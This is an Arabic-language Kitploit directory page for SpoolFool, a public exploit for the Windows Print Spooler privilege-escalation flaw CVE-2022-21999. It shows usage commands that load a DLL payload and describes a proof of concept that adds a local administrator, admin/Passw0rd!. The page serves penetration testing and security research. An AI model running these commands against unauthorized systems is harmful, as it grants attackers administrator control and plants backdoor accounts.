Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SpoolFool — استغلال لثغرة CVE-2022-21999 - ثغرة رفع الامتيازات في Windows Print Spooler (LPE) | Kitploit
أدوات/GitHubGitHub/ly4k/spoolfool
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقاستغلال الملفات الثنائية
GitHubly4k/spoolfool

SpoolFool

استغلال لثغرة CVE-2022-21999 - ثغرة رفع الامتيازات في Windows Print Spooler (LPE)

عرض المستودع
7961603منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

SpoolFool

استغلال لثغرة CVE-2022-21999 - ثغرة رفع الامتيازات في Windows Print Spooler (LPE)

التفاصيل

يجب أن يعمل الاستغلال المقدم بشكل افتراضي على جميع إصدارات سطح المكتب من Windows.

يرجى الاطلاع على منشور المدونة للحصول على التفاصيل الفنية الكاملة هنا.

الاستخدام

root@kitploit:~
PS C:\SpoolFool> .\SpoolFool.exe

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

Powershell

root@kitploit:~
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
   -dll add_user.dll
   -dll add_user.dll -printer 'My Printer'
   -dll add_user.dll -dir 'SECRET'
   -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

إثبات المفهوم

يستخدم إثبات المفهوم التالي ملف DLL لإنشاء مسؤول محلي جديد admin / Passw0rd!. يمكن العثور على ملف DLL (AddUser.dll) والكود المصدري في هذا المستودع.

التشغيل الثاني

يوضح إثبات المفهوم التالي تشغيلًا ثانيًا للاستغلال المقدم. لاحظ أن الثغرة لا تُستغل هذه المرة من أجل تحميل ملف DLL.

المخلفات

بعد تنفيذ الاستغلال، ستُترك المخلفات التالية للتنظيف لاحقًا:

  • دليل برنامج تشغيل الطابعة الذي تم إنشاؤه لا تتم إزالته
  • يتم نسخ DLL الحمولة إلى دليل برنامج تشغيل الطابعة ولا تتم إزالته
  • لا تتم إزالة أي طابعة تم إنشاؤها
  • لا تتم استعادة قيمة SpoolDirectory للطابعة المستهدفة

المؤلفون

  • Oliver Lyak @ly4k_

المراجع

  • SpoolFool: تصعيد امتيازات Windows Print Spooler (CVE-2022-21999)
تنزيل الأداة